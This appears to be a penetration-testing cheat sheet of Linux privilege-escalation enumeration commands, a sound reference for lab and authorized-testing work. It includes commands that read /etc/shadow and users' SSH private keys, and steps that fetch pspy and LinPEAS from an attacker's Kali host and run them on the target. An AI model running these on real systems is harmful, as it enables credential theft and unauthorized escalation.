Linux

LogoWADComs
LogoGTFOBins

Interesting Files

cat /etc/passwd
cat /etc/shadow
cat /etc/hosts
ls -la /var/www
ls -la /opt

cat /root/.ssh/authorized_keys
cat /root/.ssh/id_rsa
cat /home/<Username>/.ssh/id_rsa
cat /home/<Username>/.ssh/id_ecdsa
cat /home/<Username>/.ssh/authorized_keys

find / -name config.php -type f 2>/dev/null
find / -name doas.conf -type f 2>/dev/null
find / -name apache* -type d 2>/dev/null

find / -name *.txt -type f 2>/dev/null
find / -name *.sh -type f 2>/dev/null
find / -name .ht* -type f 2>/dev/null

find / -name id_rsa -type f 2>/dev/null
find / -name id_ecdsa -type f 2>/dev/null
find / -name authorized_keys -type f 2>/dev/null

find / \( -name "local.txt" -o -name "proof.txt" \) -type f 2>/dev/null

Sudo Things

List the commands user is allowed to run

sudo -l

Retrieve sudo version

sudo -V | grep -i "sudo ver"

Run as another user

su - <Username>

System Information

List system information

uname -a

CPU information

lscpu

Disck information

lsblk

USB information

lsusb

Kernel version

cat /etc/issue

Network

ss -ntlp

Network details

ip a

Routing table

routel

Hostname

hostname

Environment variables

env

Inspect command history

cat .bashrc

User Roles

Display user identity

id

Display group names user belong to

groups

Crontab

List scheduled cron jobs for current user

crontab -l

Display system wide crontab

cat /etc/crontab

Display all cronjobs

ls -lah /etc/cron.*

Search system log for cron-related activity

grep -i "CRON" /var/log/syslog

Read the cron job content inside the cronjob directory

cat <Cron Job Name>

Special Bits

Find all files on system with SUID bit

find / -perm -u=s -type f 2>/dev/null

Recursively lists all files with capabilities set

getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null

Writable Directories

Find all directories user has write permissions

find / -writable -type d 2>/dev/null

Catch Repeating Processes

Monitor specific processes in real time

watch -n 1 "ps aux | grep -i <Keyword>"
while sleep 1; do ps aux | grep -i <Keyword>; done

Monitor Proceses with PsPy

On Kali

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

On Target Machine

Retrieve the application from Kali

wget http://<Kali IP Address>/pspy64 && chmod +x pspy64

Run the application

timeout 61s ./pspy64

Reading Binaries

strings <File Name>

LinPeas

On Target Machine

Retrieve the application from Kali

wget http://<Kali IP Address>/linpeas.sh && chmod +x linpeas.sh

Run the application

./linpeas.sh
PreviousEnumerationNextWindows

Last updated